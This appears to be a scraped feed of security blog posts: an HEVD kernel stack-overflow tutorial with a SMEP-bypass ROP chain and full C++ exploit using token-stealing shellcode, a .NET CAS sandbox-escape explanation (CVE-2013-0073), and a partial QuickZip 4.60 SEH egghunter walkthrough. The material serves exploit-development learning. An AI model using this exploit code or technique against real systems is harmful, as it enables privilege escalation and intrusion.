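print(hex(hevd_base) if hevd_base is not None else "not found")
```

Returning None for a missing driver, instead of falling back to index 0, keeps a typo in the driver name from silently handing back the kernel base.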

Hunting Gadgets

The value of these gadgets is that they reside in kernel space so SMEP can’t interfere here. We can place them directly on the stack and overwrite rip so that we are always executing the first gadget and then returning to the stack where our ROP chain resides without ever going into user space. (If you have a preferred method for gadget hunting in the kernel let me know, I tried to script some things up in WinDBG but didn’t get very far before I gave up after it was clear it was super inefficient.) Original work on the gadget locations as far as I know is located here: http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html

Again, just following along with Abatchy’s blog, we can find Gadget 1 by locating a gadget that allows us to pop a value from the stack into rcx and then takes a ret soon after. That value is the one we ultimately want to place into cr4. Luckily for us, this gadget exists inside of nt!HvlEndSystemInterrupt.

We can find it in WinDBG with the following:

kd> uf HvlEndSystemInterrupt
nt!HvlEndSystemInterrupt:
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

nt!HvlEndSystemInterrupt+0x18:
fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

nt!HvlEndSystemInterrupt+0x1e:
fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

As Abatchy did, I’ve added a comment so you can see the gadget we’re after. We want this pop rcx; ret routine because if we can place an arbitrary value into rcx, there is a second gadget which allows us to mov cr4, rcx and then we’ll have everything we need.

Gadget 2 is nested within the KiEnableXSave kernel routine as follows (with some snipping) in WinDBG:

kd> uf nt!KiEnableXSave
nt!KiEnableXSave:

---SNIP---

nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret
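
The offsets in the comments of the two listings are just the gadget address minus the nt base reported by lm sm. A small Python sketch of that arithmetic follows, using the addresses from this debugging session. The helper names are mine, and the second base address in the last line is a made-up value standing in for a different boot.

```python
KERNEL_BASE = 0xFFFFF80010C7B000   # start of nt from `lm sm`
POP_RCX_ADDR = 0xFFFFF80010DC1580  # pop rcx ; ret  (nt!HvlEndSystemInterrupt)
MOV_CR4_ADDR = 0xFFFFF80011051431  # mov cr4, rcx ; ret  (nt!KiEnableXSave)


def gadget_offset(address: int, base: int) -> int:
    """Offset of a gadget relative to the module base seen in the debugger."""
    return address - base


def rebase(offset: int, runtime_base: int) -> int:
    """Absolute address of the gadget for whatever base the kernel has now."""
    return runtime_base + offset


pop_rcx_offset = gadget_offset(POP_RCX_ADDR, KERNEL_BASE)
mov_cr4_offset = gadget_offset(MOV_CR4_ADDR, KERNEL_BASE)
print(hex(pop_rcx_offset), hex(mov_cr4_offset))  # 0x146580 0x3d6431

# Hypothetical base from another boot, only to show the rebasing step.
print(hex(rebase(pop_rcx_offset, 0xFFFFF80222000000)))
```

The offsets only hold for this exact kernel build, since a different ntoskrnl.exe will place the same instructions elsewhere.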

So with these two gadget locations known to us (that is, we know their offsets relative to the kernel base), we can now implement them in our code. To be clear, the payload we’ll be sending will look like this when we overwrite the stack:

  • ‘A’ characters * 2056
  • our pop rcx gadget
  • The value we want rcx to hold
  • our mov cr4, rcx gadget
  • pointer to our shellcode.

So for those following along at home, we will overwrite rip with our first gadget, and it will pop the first 8 byte value on the stack into rcx. What value is that? Well, it’s the value that we want cr4 to hold eventually, and we can simply place it onto the stack with our stack overflow. So we will pop that value into rcx and then the gadget will hit a ret opcode which will send rip to our second gadget, which will mov cr4, rcx so that cr4 now holds the SMEP-disabled value we want. The gadget will then hit a ret opcode and return rip to where? To a pointer to our userland shellcode, which will now run seamlessly because SMEP is disabled.

You can see this implemented in code here:

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode
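
For anyone who prefers to prototype the buffer before touching C++, the same layout can be sketched in Python with struct. This is only a model of the bytes that get sent: build_payload is a name I made up, and the shellcode address passed in below is a placeholder, since the real one comes from VirtualAlloc at run time.

```python
import struct

PADDING_LEN = 2056          # 'A' bytes before the saved return address
POP_RCX_OFFSET = 0x146580   # gadget 1, relative to the nt base
MOV_CR4_OFFSET = 0x3D6431   # gadget 2, relative to the nt base
CR4_VALUE = 0x70678         # value we want placed in cr4


def build_payload(kernel_base: int, shellcode_addr: int) -> bytes:
    """Padding followed by four little-endian 64-bit slots of the ROP chain."""
    chain = struct.pack(
        "<4Q",
        kernel_base + POP_RCX_OFFSET,  # pop rcx ; ret
        CR4_VALUE,                     # popped into rcx
        kernel_base + MOV_CR4_OFFSET,  # mov cr4, rcx ; ret
        shellcode_addr,                # final ret lands on the shellcode
    )
    return b"A" * PADDING_LEN + chain


# Kernel base from the WinDBG session; the shellcode address is a placeholder.
payload = build_payload(0xFFFFF80010C7B000, 0x000001F0DEAD0000)
print(len(payload))  # 2088
```

The "<4Q" format packs four unsigned 64-bit values in little-endian order with no padding, which matches the four 8 byte memcpy calls above.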

CR4 Value

Again, just following along with Abatchy, I’ll go ahead and place the value 0x70678 into cr4. In binary that is 1110000011001111000, which is only 19 bits long, so bit 20 (the SMEP bit, counting from bit 0) is 0. You can read more about what values to input here on j00ru’s blog post about SMEP.

So if cr4 holds this value, SMEP should be disabled.
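
A quick way to sanity check a candidate cr4 value is to test bit 20 directly. The sketch below does that in Python. The helper names are mine, and 0x170678 is an assumed example of the same value with SMEP still set, not something read from this machine.

```python
SMEP_BIT = 20
SMEP_MASK = 1 << SMEP_BIT  # 0x100000


def smep_enabled(cr4: int) -> bool:
    """True if bit 20 of the given cr4 value is set."""
    return bool(cr4 & SMEP_MASK)


def clear_smep(cr4: int) -> int:
    """Same cr4 value with only the SMEP bit cleared."""
    return cr4 & ~SMEP_MASK


print(bin(0x70678))            # 0b1110000011001111000
print(smep_enabled(0x70678))   # False
print(hex(clear_smep(0x170678)))  # 0x70678 (0x170678 is an assumed starting value)
```

Clearing one bit from the value the CPU currently holds is safer than hardcoding a constant, because the other cr4 bits can differ between machines.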

Restoring Execution

The hardest part of this exploit for me was restoring execution after the shellcode ran. Unfortunately, our exploit overwrites several register values and corrupts our stack quite a bit. When my shellcode is done running (not really my shellcode, it’s borrowed from @Cneelis), this is what my callstack looked like along with my stack memory values:

Restoring execution will always be pretty specific to what version of HEVD you’re using and also perhaps what build of Windows you’re on, as some of the kernel routines will change, so I won’t go too much in depth here. I kept crashing after returning to the address in the screenshot of HEVD!IrpDeviceIoCtlHandler+0x19f, which is located on the right hand side of the screenshot at ffff9e8196b99158. What I eventually figured out is that rsi is typically zero’d out if you send regular sized buffers to the driver routine.

So if you were to send a non-overflowing buffer and put a breakpoint at nt!IopSynchronousServiceTail+0x1a0 (which is where rip would return if we took a ret out of our address of ffff9e8196b99158), you would see that rsi is typically 0 when system service routines exit normally. So when I returned, I had to have an rsi value of 0 in order to avoid an exception.

I tried just following the code through until I reached an exception with a non-zero rsi but wasn’t able to pinpoint exactly where the fault occurs or why. The debug information I got from all my bugchecks didn’t bring me any closer to the answer (probably user error). I noticed that if you don’t null out rsi before returning, rsi wouldn’t be referenced in any way until a value was popped into it from the stack which happened to be our IOCTL code, so this confused me even more.

Anyways, my hacky way of tracing through normally sized buffers and taking notes of the register values at the same point we return to out of our shellcode did work, but I’m still unsure why 😒.

Conclusion

All in all, the ROP chain to disable SMEP via cr4 wasn’t too complicated. In my opinion this could even serve as an introduction to ROP chains for some, because as far as ROP chains go this one is fairly straightforward; however, restoring execution after our shellcode was a nightmare for me. A lot of time was wasted misinterpreting the callstack readouts from WinDBG (a lesson learned). As @ihack4falafel says, make sure you keep an eye on @rsp in your memory view in WinDBG anytime you are messing with the stack.

Exploit code here.

Thanks again to all the bloggers who got me through the HEVD exploits:

Huge thanks to HackSysTeam for developing the driver for us to all practice on, can’t wait to tackle it on Linux!

#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL                   0x222003

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver" << endl;
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: 0x" << hex
        << (INT64)hFile << endl;

    return hFile;
}

void send_payload(HANDLE hFile, INT64 kernel_base) {

    cout << "[>] Allocating RWX shellcode..." << endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        //found_system:
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS
        "\xc3";

    LPVOID shellcode_addr = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    cout << "[>] Shellcode allocated in userland at: 0x" << (INT64)shellcode_addr
        << endl;

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

    // keep this here for testing so you can see what normal buffers do to subsequent routines
    // to learn from for execution restoration
    /*
    BYTE input_buff[2048] = { 0 };
    memset(input_buff, '\x41', 2048);
    */

    cout << "[>] Input buff located at: 0x" << (INT64)&input_buff << endl;

    DWORD bytes_ret = 0x0;

    cout << "[>] Sending payload..." << endl;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] DeviceIoControl failed!" << endl;
    }
}

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

void spawn_shell() {

    cout << "[>] Spawning nt authority/system shell..." << endl;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si); // CreateProcess expects cb to hold the size of the structure

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        0,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}

int main() {

    HANDLE hFile = grab_handle();

    INT64 kernel_base = get_kernel_base();
    send_payload(hFile, kernel_base);
    spawn_shell();
}

The Summer of PWN

By: h0mbre
5 May 2020 at 04:00

Summer Plans

Now that I finished the HEVD series of posts, it’s time for me to switch gears. The series became more of a chore as I progressed and the exercise felt quite silly for a few reasons. Primarily, there are still so many fundamental binary exploitation concepts that I still don’t know. Why was I spending so much time on very esoteric material when I haven’t even accomplished the basics? The material was tied closely to my wanting to take AWE with Offsec, but since that is not happening, I get to focus now on going back to the basics.

For the foreseeable future, I’m going to be working primarily on leveling up my pwn skills by doing CTF challenges, reversing, analyzing malware, and developing.

Some of the tools I’m going to be using this summer (I’ll update this as I go along):

I will be keeping a daily log of everything I do and will publish it so those trying to accomplish similar goals can see what I tried. I’ll also make a post at the end detailing what went right and what went wrong.

I’m taking a purposeful break from blogging so that I can focus on leveling up. Blogging takes a lot of my time and it’s interfering with my ability to put hours into getting better. I will hopefully be able to do a write-up detailing how I exploited a bug I found in another Windows kernel mode driver.

Keeping track of the Linux pwn challenge exploits here.

Until then, see you on the other side!

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

By: tiraniddo
7 May 2020 at 23:12
It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the takeaway is that at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.
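
To make the two diagrams concrete, here is a toy model of the stack walk in Python. It is a heavy simplification written for this post and not how the CLR is implemented: the Frame class, the demand function, and the frame names are all invented, and a single boolean stands in for the whole Permission Grant Set.

```python
from dataclasses import dataclass
from typing import List


class SecurityException(Exception):
    pass


@dataclass
class Frame:
    name: str
    trusted: bool          # does this frame's assembly hold the permission?
    asserts: bool = False  # does this frame Assert the permission?


def demand(stack: List[Frame]) -> bool:
    """Walk the callers, most recent first, the way a Demand would."""
    for frame in stack:
        if not frame.trusted:
            raise SecurityException(f"blocked at {frame.name}")
        if frame.asserts:
            return True  # an Assert ends the walk successfully
    return True  # every frame on the stack was trusted


# First diagram: the untrusted caller sits between the Demand and the Assert.
direct_call = [
    Frame("File.OpenRead", trusted=True),
    Frame("Untrusted caller", trusted=False),
    Frame("Framework code (Assert)", trusted=True, asserts=True),
]

# Second diagram: the delegate points at a trusted function instead.
via_delegate = [
    Frame("File.OpenRead", trusted=True),
    Frame("Trusted delegate target", trusted=True),
    Frame("Framework code (Assert)", trusted=True, asserts=True),
]

try:
    demand(direct_call)
except SecurityException as exc:
    print(exc)  # blocked at Untrusted caller
print(demand(via_delegate))  # True
```

The only difference between the two stacks is the middle frame, which is exactly what the delegate trick swaps out.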

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such as a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions. Could we use something like the following?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression<EventHandler> lambda = (o,e) => File.OpenRead(@"C:\SomePath");
EventHandler f = lambda.Compile();

We're still using a lambda, surely nothing has changed? Well, let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides that, rather than create a delegate in your assembly, it'll create something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never fully scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context, including things like JavaScript engines such as V8 or JSCore.


QuickZip 4.60 SEH Based Buffer Overflow w/ Egghunter

Structured Exception Handling (SEH) Based Buffer Overflow Vulnerability

Kali Linux
Windows Vista
QuickZip 4.60


Bug found by: corelancod3r (http://corelan.be:8800)
Software Link: http://www.quickzip.org/downloads.html


GitHub: https://github.com/pyt3ra/QuickZip_4_60_SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

This is another SEH based buffer overflow with an egghunter implementation. A more detailed explanation that I wrote about an egghunter implementation can be found here: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

You can find numerous write-ups about this vulnerability and its exploitation. This buffer overflow gives us a good mix of shellcode encoding (due to restricted characters) and egghunter implementation.

I'm doing this as part of my preparation for the Offensive Security Certified Expert (OSCE) certification.

0x0 - Setup

Our Proof-of-Concept creates a .zip file that we will access using QuickZip.





0x1 - Fuzzing

As usual, step one in exploit development is fuzzing. This allows us to examine how the program responds when we introduce a buffer (oversized) to it.

We will be using the fuzzer from corelan as shown below.


We examine the crash using Immunity Debugger and we can see that we have successfully overwritten the SEH handler with 41s.


0x2 - Calculating the offset

We will utilize Metasploit's pattern_create.rb and pattern_offset.rb

First, we create unique characters of 4068 bytes and update our POC



We check the SEH chain after the crash to get the offset values

SEH: 6B41396A
nSEH: 41386A41


Second, we calculate these values using pattern_offset.rb
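
If Metasploit is not at hand, the same lookup can be reproduced with a few lines of Python. This is a sketch of the cyclic pattern idea, assuming the default character sets (A-Z, a-z, 0-9) that pattern_create.rb uses. The function names simply mirror the Ruby scripts and are not part of any library.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> bytes:
    """Cyclic pattern Aa0Aa1Aa2... cut to `length` bytes (max 20280)."""
    triples = (u + l + d for u, l, d in
               product(ascii_uppercase, ascii_lowercase, digits))
    return "".join(triples)[:length].encode("ascii")


def pattern_offset(value: int, length: int) -> int:
    """Offset of a 32-bit register value inside the pattern, or -1.

    The debugger shows the value as a number, so it is converted back
    to the little-endian byte order it had in memory before searching.
    """
    needle = struct.pack("<I", value)
    return pattern_create(length).find(needle)


print(pattern_offset(0x41386A41, 4068))  # nSEH -> 294
print(pattern_offset(0x6B41396A, 4068))  # SEH  -> 298
```

The two offsets are 4 bytes apart, which is what we expect since nSEH sits directly before the SEH handler in the record.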


Finally, we update our POC and verify if these values are correct.

If everything is correct, we should see Bs at byte 294 and Cs at byte 298.



Our values are correct as we see the 43s and 42s overwrite both SEH and nSEH respectively.


0x3 - Verifying Restricted Characters

At this point, we are now ready to find an address to redirect the SEH handler. However, before we waste our time looking for an address, we will need to verify first if there are restricted characters. 

First, I worked on the first 128 bytes (x01 to x7F)

I sent the characters to the program and carefully watched how the program responded to them. If a character gets mangled/truncated/updated, then it's a bad character.

After numerous tries, I was able to narrow down the restricted characters to the following:

'\x10\x0f\x14\x15\x2f\x3d\x3a\x5b'
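
The trial-and-error loop can be sped up a little with two helpers: one that builds the next test block without the characters already known to be bad, and one that compares what was sent against what shows up in the dump. A rough Python sketch follows. Both helper names are mine, and the received bytes have to be copied out of the debugger by hand.

```python
from typing import List, Tuple

BAD_CHARS = b"\x10\x0f\x14\x15\x2f\x3d\x3a\x5b"


def candidate_bytes(start: int, end: int, exclude: bytes = b"") -> bytes:
    """All byte values from start to end (inclusive) minus the excluded ones."""
    return bytes(b for b in range(start, end + 1) if b not in exclude)


def mangled_positions(sent: bytes, received: bytes) -> List[Tuple[int, int, int]]:
    """(index, sent byte, received byte) for every position that differs."""
    return [(i, s, r) for i, (s, r) in enumerate(zip(sent, received)) if s != r]


low_block = candidate_bytes(0x01, 0x7F, BAD_CHARS)
print(len(low_block))  # 119 bytes left to test

# Example comparison with a made-up two byte dump.
print(mangled_positions(b"\x01\x89", b"\x01\xeb"))  # [(1, 137, 235)]
```

A truncated dump needs separate handling, since zip stops at the shorter input and will not report the missing tail.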

Updated POC below:


Second, I worked with the other 128 bytes (x80 to xff)

Interestingly, hex characters 80 and above are changed to an arbitrary hex character.

I sent the following characters...


...and we see the following conversion in Immunity Debugger

The table below shows the conversion (not a complete list).



0x4 - POP-POP-RET address!

Now that we know which characters are not allowed, we are ready to find a POP-POP-RET address.

Lucky for us, Immunity Debugger's mona.py module enables an easier way to find a POP-POP-RET address. 

There were multiple addresses found.

Although not ideal since it has null bytes, we will be using address 00435133


We can verify that this is indeed a POP-POP-RET address by searching for it.


We can update our POC with this address and see if our SEH handler gets redirected to it. 

Note that the address has to be in little-endian.
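
As a short illustration of the byte order, this is how the address could be packed in Python. The variable names are mine and only the address itself comes from the mona output.

```python
import struct

POP_POP_RET = 0x00435133  # address picked from the mona.py results

# "<I" packs an unsigned 32-bit value with the least significant byte first.
seh = struct.pack("<I", POP_POP_RET)
print(seh.hex(" "))  # 33 51 43 00
```

Note that in little-endian order the null byte ends up as the last of the four bytes.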


We fire up the POC and we have successfully redirected the SEH handler as shown below:




…once we take the pop-pop-ret, we then get redirected to our nseh values (EBs)

Note that our Ds are nowhere to be found now. However, our As are easily accessible, sitting right above our nSEH. This means our initial jump will have to be a backward jump toward the beginning of our As, which should get us up to roughly 127 bytes of space from which to jump further to a bigger space (the Ds location).


0x5 - First Jump


Normally, we could simply do a backward short jump of the maximum distance (EB 80). However, note that any byte of 0x80 or above is restricted and gets converted to a different byte.

More info about jump shorts (forward and reverse) can be found here: https://thestarman.pcministry.com/asm/2bytejumps.htm

If we go back to our bad characters table, we can see that hex 89 and 9F translate to EB and 83 respectively.

Sent    Received
89      EB
9F      83

Here's how the EB 83 instructions would work as shown in Immunity. 


We can now update our POC with our first jump


We see our EB 83 first jump in SEH chain


We take the pop-pop-ret and we successfully hit our first jump…from 0012FBB0 to 0012FB35
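The landing address can be checked by hand. The displacement byte of a short jump is a signed 8-bit value counted from the end of the 2-byte instruction, so 0x83 means 125 bytes backwards. A small sketch (the function name is hypothetical):

```python
def short_jump_target(address: int, displacement_byte: int) -> int:
    """Return the target of a 2-byte JMP SHORT (EB xx) located at `address`."""
    # Interpret the displacement byte as a signed 8-bit value.
    if displacement_byte >= 0x80:
        displacement = displacement_byte - 0x100
    else:
        displacement = displacement_byte
    # The displacement is relative to the instruction that follows the jump.
    return (address + 2 + displacement) & 0xFFFFFFFF


if __name__ == "__main__":
    # EB 83 sitting in nSEH at 0012FBB0
    print(hex(short_jump_target(0x0012FBB0, 0x83)))
```

This reproduces the jump from 0012FBB0 to 0012FB35 seen in the debugger.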


0x6 - Second Jump - Egghunter

Remember that the address space for our Ds no longer shows up near our As, although it is still in memory. This is ideally where our reverse shellcode would go.

Note above that our dump doesn't show our Ds anywhere close to our As.

Just because we can't see it doesn't mean it is gone…this is where an egghunter shellcode comes into play.

Here's a write-up that I did about egghunter: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

Mona.py also has a module to create an egghunter.

Note: I will be using a different egghunter

Due to restricted characters, we will need to carve out our egghunter shellcode so I will be using the egghunter shellcode that I used for OSCE prep (I spent way too much time carving them).

Also, note that I added a second EB 83 jump to gain another 120+ bytes of address space, as I noticed that the first jump alone didn't give us enough room.

Before we can start carving out the egghunter shellcode, we need to align ESP to point to the space below our first EB 08 at address 0012FB8D, which is where our egghunter shellcode will be decoded.

We can see that ESP currently points to 0012F574 and we want it to point to 0012FB8D.


We will need to add 1561 (0x619) to ESP.


To align ESP, we need the following instructions:

PUSH ESP
POP EAX
ADD AX, 0x619
PUSH EAX
POP ESP

Keep in mind that we still need to avoid restricted characters...fortunately, the opcodes that correspond to these instructions are not restricted
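The adjustment value and the resulting opcodes can be double-checked with a few lines of Python. This is a sketch: the opcode bytes below are the standard x86 encodings for these instructions, written out by hand rather than copied from the POC.

```python
current_esp = 0x0012F574   # ESP as seen in the debugger
wanted_esp = 0x0012FB8D    # where the decoded egghunter should land

delta = wanted_esp - current_esp

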